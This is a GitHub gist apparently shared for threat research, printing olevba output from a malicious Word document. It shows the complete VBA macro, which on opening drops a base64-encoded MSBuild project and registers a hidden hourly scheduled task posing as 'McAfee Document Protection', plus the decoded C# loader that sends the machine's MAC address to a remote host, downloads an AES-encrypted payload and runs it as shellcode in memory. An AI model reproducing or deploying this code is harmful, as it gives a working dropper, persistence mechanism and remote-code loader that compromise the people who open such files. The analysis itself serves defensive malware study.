Skip to content

Instantly share code, notes, and snippets.

@W00t3k

W00t3k/9e910797589da01a4b13ecb7fcd58f81dfc18784dd6ed4996e5a5f8f1f95e224

Forked from JohnLaTwC/9e910797589da01a4b13ecb7fcd58f81dfc18784dd6ed4996e5a5f8f1f95e224
Created January 27, 2019 17:19
Show Gist options
  • Save W00t3k/3096955e907f4256838b42897adfd668 to your computer and use it in GitHub Desktop.
Save W00t3k/3096955e907f4256838b42897adfd668 to your computer and use it in GitHub Desktop.
Download ZIP
VBA DOC Malware MSBuild Scheduled Task
Raw
9e910797589da01a4b13ecb7fcd58f81dfc18784dd6ed4996e5a5f8f1f95e224
## uploaded by @JohnLaTwC
## Sample Hash: 9e910797589da01a4b13ecb7fcd58f81dfc18784dd6ed4996e5a5f8f1f95e224
## Sample evolution:
## c2e126498e61d4dc4154b5721dfd9811cd1d8c84063477e271134f0ed30e29ea
## df7fc66bcceaf9b041fe839b5cda95dfad14c8475c6e2ec49dc23d5ae3ba62ac
## b621015caa6077d7e85807c7f1509f88d5560d3e4ef439f578edc43f7b01c071
## 7d2bf283d12bc6914708e2a4240c2cefbd1871c3b4ac3c9b2a70ea7553fb7f4a
## 13fc853eb0e59b8133f93a3f55ed4086ffa8545aecef513f0bfe8363467fb110
## 5e53334b062c7c908a7354c77343e7d356959727930f2557b5e65b936b2cd462
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OLE:MASIHB-- 9e910797589da01a4b13ecb7fcd58f81dfc18784dd6ed4996e5a5f8f1f95e224
===============================================================================
FILE: 9e910797589da01a4b13ecb7fcd58f81dfc18784dd6ed4996e5a5f8f1f95e224
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: 9e910797589da01a4b13ecb7fcd58f81dfc18784dd6ed4996e5a5f8f1f95e224 - OLE stream: 'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Sub Document_Open()
Dim msbPath As String
msbPath = Environ("windir") & "\Microsoft.NET\Framework64\v4.0.30319\msbuild" & ".e" & "x" & "E"
If (Len(Dir(msbPath)) = 0) Then
MsgBox "System requirements not satisfied"
Else
Foo (msbPath)
End If
End Sub
Private Function decodeBase64(ByVal strData As String) As Byte()
Dim objXML As MSXML2.DOMDocument
Dim objNode As MSXML2.IXMLDOMElement
Set objXML = New MSXML2.DOMDocument
Set objNode = objXML.createElement("b64")
objNode.dataType = "bin.base64"
objNode.Text = strData
decodeBase64 = objNode.nodeTypedValue
Set objNode = Nothing
Set objXML = Nothing
End Function
Private Sub Foo(msbPath As String)
myFile = Environ("TEMP") & "\sales.msproj"
Open myFile For Output As #1
Print #1, decodeBase64("PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPgogICAgPFRhcmdldCBOYW1lPSJIZWxsbyI+CiAgICAgICAgPENsYXM=");
Print #1, decodeBase64("c0V4YW1wbGUgLz4KICAgIDwvVGFyZ2V0PgogICAgPFVzaW5nVGFzawogICAgICAgIFRhc2tOYW1lPSJDbGFzc0V4YW1wbGUiCiAgICAgICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSIKICAgICAgICBBc3NlbWJseUY=");
Print #1, decodeBase64("aWxlPSJDOlxXaW5kb3dzXE1pY3Jvc29mdC5OZXRcRnJhbWV3b3JrXHY0LjAuMzAzMTlcTWljcm9zb2Z0LkJ1aWxkLlRhc2tzLnY0LjAuZGxsIiA+CiAgICAgICAgICAgIDxUYXNrPgogICAgICAgIDxDb2RlIFR5cGU9IkNsYXM=");
Print #1, decodeBase64("cyIgTGFuZ3VhZ2U9ImNzIj4KICAgICAgICAgICAgPCFbQ0RBVEFbCiAgICAgICAgICAgICAgICB1c2luZyBTeXN0ZW07CiAgICAgICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOwogICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgIHVzaW5nIE1pY3Jvc29mdC5CdWlsZC5VdGlsaXRpZXM7CiAgICAgICAgICAgICAgICB1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CiAgICAgICAgICAgICAgICB1c2luZyBTeXN0ZW0uTmV0Owo=");
Print #1, decodeBase64("ICAgICAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5OZXQuTmV0d29ya0luZm9ybWF0aW9uOwogICAgICAgICAgICAgICAgdXNpbmcgU3lzdGVtLklPOwogICAgICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkxpbnE7CiAgICAgICA=");
Print #1, decodeBase64("ICAgICAgICAgdXNpbmcgU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeTsKCiAgICAgICAgICAgICAgICBwdWJsaWMgY2xhc3MgQ2xhc3NFeGFtcGxlIDogIFRhc2ssIElUYXNrCiAgICAgICAgICAgICAgICB7CiAgICAgICA=");
Print #1, decodeBase64("ICAgICAgICAgICAgIFtGbGFnc10KICAgICAgICAgICAgICAgICAgICBwdWJsaWMgZW51bSBBbGxvY2F0aW9uVHlwZSA6IHVpbnQKICAgICAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgICAgIENPTU1JVCA=");
Print #1, decodeBase64("PSAweDEwMDAsCiAgICAgICAgICAgICAgICAgICAgICAgIFJFU0VSVkUgPSAweDIwMDAsCiAgICAgICAgICAgICAgICAgICAgICAgIFJFU0VUID0gMHg4MDAwMCwKICAgICAgICAgICAgICAgICAgICAgICAgTEFSR0VfUEFHRVM=");
Print #1, decodeBase64("ID0gMHgyMDAwMDAwMCwKICAgICAgICAgICAgICAgICAgICAgICAgUEhZU0lDQUwgPSAweDQwMDAwMCwKICAgICAgICAgICAgICAgICAgICAgICAgVE9QX0RPV04gPSAweDEwMDAwMCwKICAgICAgICAgICAgICAgICAgICAgICA=");
Print #1, decodeBase64("IFdSSVRFX1dBVENIID0gMHgyMDAwMDAKICAgICAgICAgICAgICAgICAgICB9CgogICAgICAgICAgICAgICAgICAgIFtGbGFnc10KICAgICAgICAgICAgICAgICAgICBwdWJsaWMgZW51bSBNZW1vcnlQcm90ZWN0aW9uIDogdWk=");
Print #1, decodeBase64("bnQKICAgICAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgICAgIEVYRUNVVEUgPSAweDEwLAogICAgICAgICAgICAgICAgICAgICAgICBFWEVDVVRFX1JFQUQgPSAweDIwLAogICAgICAgICAgICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgRVhFQ1VURV9SRUFEV1JJVEUgPSAweDQwLAogICAgICAgICAgICAgICAgICAgICAgICBFWEVDVVRFX1dSSVRFQ09QWSA9IDB4ODAsCiAgICAgICAgICAgICAgICAgICAgICAgIE5PQUNDRVNTID0gMHgwMSwKICAgICA=");
Print #1, decodeBase64("ICAgICAgICAgICAgICAgICAgIFJFQURPTkxZID0gMHgwMiwKICAgICAgICAgICAgICAgICAgICAgICAgUkVBRFdSSVRFID0gMHgwNCwKICAgICAgICAgICAgICAgICAgICAgICAgV1JJVEVDT1BZID0gMHgwOCwKICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgICAgICAgICAgIEdVQVJEX01vZGlmaWVyZmxhZyA9IDB4MTAwLAogICAgICAgICAgICAgICAgICAgICAgICBOT0NBQ0hFX01vZGlmaWVyZmxhZyA9IDB4MjAwLAogICAgICAgICAgICAgICAgICAgICAgICBXUklURUM=");
Print #1, decodeBase64("T01CSU5FX01vZGlmaWVyZmxhZyA9IDB4NDAwCiAgICAgICAgICAgICAgICAgICAgfQoKICAgICAgICAgICAgICAgICAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3IgPSB0cnVlKV0KICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgICAgICAgc3RhdGljIGV4dGVybiBJbnRQdHIgVmlydHVhbEFsbG9jKEludFB0ciBscEFkZHJlc3MsIFVJbnRQdHIgZHdTaXplLCBBbGxvY2F0aW9uVHlwZSBmbEFsbG9jYXRpb25UeXBlLCBNZW1vcnlQcm90ZWN0aW8=");
Print #1, decodeBase64("biBmbFByb3RlY3QpOwoKICAgICAgICAgICAgICAgICAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMiIpXQogICAgICAgICAgICAgICAgICAgIHByaXZhdGUgc3RhdGljIGV4dGVybiBJbnRQdHIgQ3JlYXRlVGhyZWFkKAogICAgICA=");
Print #1, decodeBase64("ICAgICAgICAgICAgICAgICAgSW50UHRyIGxwVGhyZWFkQXR0cmlidXRlcywKICAgICAgICAgICAgICAgICAgICAgICAgVUludDMyIGR3U3RhY2tTaXplLAogICAgICAgICAgICAgICAgICAgICAgICBJbnRQdHIgbHBTdGFydEE=");
Print #1, decodeBase64("ZGRyZXNzLAogICAgICAgICAgICAgICAgICAgICAgICBJbnRQdHIgcGFyYW0sCiAgICAgICAgICAgICAgICAgICAgICAgIFVJbnQzMiBkd0NyZWF0aW9uRmxhZ3MsCiAgICAgICAgICAgICAgICAgICAgICAgIEludFB0ciBscFQ=");
Print #1, decodeBase64("aHJlYWRJZAogICAgICAgICAgICAgICAgICAgICk7CgogICAgICAgICAgICAgICAgICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyIildCiAgICAgICAgICAgICAgICAgICAgcHJpdmF0ZSBzdGF0aWMgZXh0ZXJuIFVJbnQzMiBXYWk=");
Print #1, decodeBase64("dEZvclNpbmdsZU9iamVjdCgKICAgICAgICAgICAgICAgICAgICAgICAgSW50UHRyIGhIYW5kbGUsCiAgICAgICAgICAgICAgICAgICAgICAgIFVJbnQzMiBkd01pbGxpc2Vjb25kcwogICAgICAgICAgICAgICAgICAgICk7Cgo=");
Print #1, decodeBase64("ICAgICAgICAgICAgICAgICAgICBbVW5tYW5hZ2VkRnVuY3Rpb25Qb2ludGVyQXR0cmlidXRlKENhbGxpbmdDb252ZW50aW9uLkNkZWNsKV0KICAgICAgICAgICAgICAgICAgICBwdWJsaWMgZGVsZWdhdGUgSW50MzIgRXhlY3U=");
Print #1, decodeBase64("dGVEZWxlZ2F0ZSgpOwoKICAgICAgICAgICAgICAgICAgICBwdWJsaWMgdm9pZCBQcmVwcm9jZXNzKCkKICAgICAgICAgICAgICAgICAgICB7ICAgCgogICAgICAgICAgICAgICAgICAgICAgICB0cnkKICAgICAgICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZhciBtYWNBZGRyID0gCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAoCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZnJvbSBuaWMgaW4=");
Print #1, decodeBase64("IE5ldHdvcmtJbnRlcmZhY2UuR2V0QWxsTmV0d29ya0ludGVyZmFjZXMoKQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdoZXJlIG5pYy5PcGVyYXRpb25hbFN0YXR1cyA9PSBPcGVyYXRpb25hbFN0YXR1cy5VcAo=");
Print #1, decodeBase64("ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzZWxlY3QgbmljLkdldFBoeXNpY2FsQWRkcmVzcygpLlRvU3RyaW5nKCkKICAgICAgICAgICAgICAgICAgICAgICAgICAgICkuRmlyc3RPckRlZmF1bHQoKTsKCiAgICA=");
Print #1, decodeBase64("ICAgICAgICAgICAgICAgICAgICAgICAgU3RyaW5nIHVybCA9IFN0cmluZy5Gb3JtYXQoImh0dHBzOi8vZm9vLmNvbS9wYXRoP2NpZD17MH0iLCBtYWNBZGRyKTsKCiAgICAgICAgICAgICAgICAgICAgICAgICAgICB1c2luZyA=");
Print #1, decodeBase64("KFdlYkNsaWVudCBjbGllbnQgPSBuZXcgV2ViQ2xpZW50KCkpCiAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXNpbmcgKFN0cmVhbSBzdHJlYW0gPSBjbGllbnQ=");
Print #1, decodeBase64("Lk9wZW5SZWFkKHVybCkpCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBieXRlW10gc2MgPSBEcmFpblBpcGUoc3RyZWFtKTsKICAgICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbnRQdHIgZnVuY0FkZHIgPSBWaXJ0dWFsQWxsb2MoSW50UHRyLlplcm8sIChVSW50UHRyKXNjLkxlbmd0aCwgQWw=");
Print #1, decodeBase64("bG9jYXRpb25UeXBlLlJFU0VSVkUgfCBBbGxvY2F0aW9uVHlwZS5DT01NSVQsIE1lbW9yeVByb3RlY3Rpb24uRVhFQ1VURV9SRUFEV1JJVEUpOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNYXJzaGFsLkM=");
Print #1, decodeBase64("b3B5KHNjLCAwLCAoSW50UHRyKShmdW5jQWRkciksIHNjLkxlbmd0aCk7CgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbnRQdHIgaFRocmVhZCA9IEludFB0ci5aZXJvOwoKICAgICAgICAgICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgICAgICAgICAgICAgIGhUaHJlYWQgPSBDcmVhdGVUaHJlYWQoSW50UHRyLlplcm8sIDAsIGZ1bmNBZGRyLCBJbnRQdHIuWmVybywgMCwgSW50UHRyLlplcm8pOwogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgV2FpdEZvclNpbmdsZU9iamVjdChoVGhyZWFkLCAweEZGRkZGRkZGKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgICAgIGNhdGNoIChFeGNlcHRpb24pIHt9ICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgfQoKICAgICAgICAgICAgICAgICAgICBwdWJsaWM=");
Print #1, decodeBase64("IHN0YXRpYyBieXRlW10gRHJhaW5QaXBlKFN0cmVhbSBzdHJlYW0pCiAgICAgICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICBieXRlW10gYnVmZmVyID0gbmV3IGJ5dGVbMjA0OF07CiAgICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgICAgICAgICBieXRlW10gaXYgPSBuZXcgYnl0ZVsxNl0geyAweDZiLDB4MTgsMHhiNywweDE1LDB4NDMsMHhhYiwweGMzLDB4MzAsMHhlOSwweDZkLDB4YTUsMHhlYSwweDU3LDB4MzUsMHhjNiwweGYxIH07CiAgICA=");
Print #1, decodeBase64("ICAgICAgICAgICAgICAgICAgICBieXRlW10ga2V5ID0gbmV3IGJ5dGVbMTZdIHsgMHg3YSwweDc5LDB4YTcsMHhlMiwweDNhLDB4NWMsMHg5YywweGU0LDB4MmEsMHgxMywweDgsMHhlOCwweGJhLDB4YzcsMHg2NSwweGFlIH0=");
Print #1, decodeBase64("OwoKICAgICAgICAgICAgICAgICAgICAgICAgQWVzIGVuY3J5cHRvciA9IEFlcy5DcmVhdGUoKTsKICAgICAgICAgICAgICAgICAgICAgICAgZW5jcnlwdG9yLk1vZGUgPSBDaXBoZXJNb2RlLkNCQzsKICAgICAgICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgICAgIGVuY3J5cHRvci5QYWRkaW5nID0gUGFkZGluZ01vZGUuUEtDUzc7CiAgICAgICAgICAgICAgICAgICAgICAgIGVuY3J5cHRvci5LZXkgPSBrZXk7CiAgICAgICAgICAgICAgICAgICAgICAgIGVuY3J5cHRvci4=");
Print #1, decodeBase64("SVYgPSBpdjsKICAgICAgICAgICAgICAgICAgICAgICAgSUNyeXB0b1RyYW5zZm9ybSBkZWNyeXB0b3IgPSBlbmNyeXB0b3IuQ3JlYXRlRGVjcnlwdG9yKCk7CiAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgICAgICAgdXNpbmcgKE1lbW9yeVN0cmVhbSBtcyA9IG5ldyBNZW1vcnlTdHJlYW0oKSkKICAgICAgICAgICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgdXNpbmcgKENyeXB0b1N0cmU=");
Print #1, decodeBase64("YW0gY3MgPSBuZXcgQ3J5cHRvU3RyZWFtKG1zLCBkZWNyeXB0b3IsIENyeXB0b1N0cmVhbU1vZGUuV3JpdGUpKQogICAgICAgICAgICAgICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHc=");
Print #1, decodeBase64("aGlsZSAodHJ1ZSkKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGludCByZWFkID0gc3RyZWFtLlJlYWQoYnVmZmVyLCAwLCBidWZmZXIuTGVuZ3Q=");
Print #1, decodeBase64("aCk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmIChyZWFkIDw9IDApCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA=");
Print #1, decodeBase64("ICAgICBjcy5GbHVzaEZpbmFsQmxvY2soKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiBtcy5Ub0FycmF5KCk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KICA=");
Print #1, decodeBase64("ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY3MuV3JpdGUoYnVmZmVyLCAwLCByZWFkKTsKICAgICAgICAgICAgICAgICAgICAgICAgICA=");
Print #1, decodeBase64("ICAgICAgfQogICAgICAgICAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgfQoKICAgICAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCA=");
Print #1, decodeBase64("RXhlY3V0ZSgpCiAgICAgICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICBQcmVwcm9jZXNzKCk7CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiB0cnVlOwogICAgICAgICAgICAgICAgICAgIH0=");
Print #1, decodeBase64("CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICBdXT4KICAgICAgICAgICAgPC9Db2RlPgogICAgICAgIDwvVGFzaz4KICAgIDwvVXNpbmdUYXNrPgo8L1Byb2plY3Q+Cgo=");
Close #1
Bar (msbPath)
End Sub
Private Sub Bar(msbPath As String)
Const TriggerTypeTime = 1
Const TASK_ACTION_EXEC = 0
Const TASK_CREATE_OR_UPDATE = 6
Const TASK_LOGON_S4U = 2
Set service = CreateObject("Schedule.Service")
Call service.Connect
Dim rootFolder
Set rootFolder = service.GetFolder("\")
Dim taskDefinition
Set taskDefinition = service.NewTask(0)
Dim regInfo
Set regInfo = taskDefinition.RegistrationInfo
regInfo.Author = "McAfee Corporation"
regInfo.Date = "2017-12-11T13:21:17-01:00"
Dim settings
Set settings = taskDefinition.settings
settings.Enabled = True
settings.StartWhenAvailable = True
settings.Hidden = True
Dim triggers
Set triggers = taskDefinition.triggers
Dim trigger
Set trigger = triggers.Create(TriggerTypeTime)
trigger.Enabled = True
trigger.StartBoundary = "2017-12-11T13:21:17-01:00"
trigger.Repetition.Interval = "PT60M"
Dim Action
Set Action = taskDefinition.Actions.Create(TASK_ACTION_EXEC)
Action.Path = msbPath
Action.Arguments = "25804802-f420-498c-a61e-b0612c8e735d"
Action.WorkingDirectory = Environ("TEMP")
Call rootFolder.RegisterTaskDefinition("McAfee Document Protection", taskDefinition, TASK_CREATE_OR_UPDATE, , , TASK_LOGON_S4U)
End Sub
-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: 9e910797589da01a4b13ecb7fcd58f81dfc18784dd6ed4996e5a5f8f1f95e224 - OLE stream: 'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
## dropped file:
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System.Runtime.InteropServices;
using System.Net;
using System.Net.NetworkInformation;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
public class ClassExample : Task, ITask
{
[Flags]
public enum AllocationType : uint
{
COMMIT = 0x1000,
RESERVE = 0x2000,
RESET = 0x80000,
LARGE_PAGES = 0x20000000,
PHYSICAL = 0x400000,
TOP_DOWN = 0x100000,
WRITE_WATCH = 0x200000
}
[Flags]
public enum MemoryProtection : uint
{
EXECUTE = 0x10,
EXECUTE_READ = 0x20,
EXECUTE_READWRITE = 0x40,
EXECUTE_WRITECOPY = 0x80,
NOACCESS = 0x01,
READONLY = 0x02,
READWRITE = 0x04,
WRITECOPY = 0x08,
GUARD_Modifierflag = 0x100,
NOCACHE_Modifierflag = 0x200,
WRITECOMBINE_Modifierflag = 0x400
}
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, AllocationType flAllocationType, MemoryProtection flProtect);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
IntPtr lpThreadAttributes,
UInt32 dwStackSize,
IntPtr lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
IntPtr lpThreadId
);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
[UnmanagedFunctionPointerAttribute(CallingConvention.Cdecl)]
public delegate Int32 ExecuteDelegate();
public void Preprocess()
{
try
{
var macAddr =
(
from nic in NetworkInterface.GetAllNetworkInterfaces()
where nic.OperationalStatus == OperationalStatus.Up
select nic.GetPhysicalAddress().ToString()
).FirstOrDefault();
String url = String.Format("https://foo.com/path?cid={0}", macAddr);
using (WebClient client = new WebClient())
{
using (Stream stream = client.OpenRead(url))
{
byte[] sc = DrainPipe(stream);
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, AllocationType.RESERVE | AllocationType.COMMIT, MemoryProtection.EXECUTE_READWRITE);
Marshal.Copy(sc, 0, (IntPtr)(funcAddr), sc.Length);
IntPtr hThread = IntPtr.Zero;
hThread = CreateThread(IntPtr.Zero, 0, funcAddr, IntPtr.Zero, 0, IntPtr.Zero);
WaitForSingleObject(hThread, 0xFFFFFFFF);
}
}
}
catch (Exception) {}
}
public static byte[] DrainPipe(Stream stream)
{
byte[] buffer = new byte[2048];
byte[] iv = new byte[16] { 0x6b,0x18,0xb7,0x15,0x43,0xab,0xc3,0x30,0xe9,0x6d,0xa5,0xea,0x57,0x35,0xc6,0xf1 };
byte[] key = new byte[16] { 0x7a,0x79,0xa7,0xe2,0x3a,0x5c,0x9c,0xe4,0x2a,0x13,0x8,0xe8,0xba,0xc7,0x65,0xae };
Aes encryptor = Aes.Create();
encryptor.Mode = CipherMode.CBC;
encryptor.Padding = PaddingMode.PKCS7;
encryptor.Key = key;
encryptor.IV = iv;
ICryptoTransform decryptor = encryptor.CreateDecryptor();
using (MemoryStream ms = new MemoryStream())
{
using (CryptoStream cs = new CryptoStream(ms, decryptor, CryptoStreamMode.Write))
{
while (true)
{
int read = stream.Read(buffer, 0, buffer.Length);
if (read <= 0)
{
cs.FlushFinalBlock();
return ms.ToArray();
}
cs.Write(buffer, 0, read);
}
}
}
}
public override bool Execute()
{
Preprocess();
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment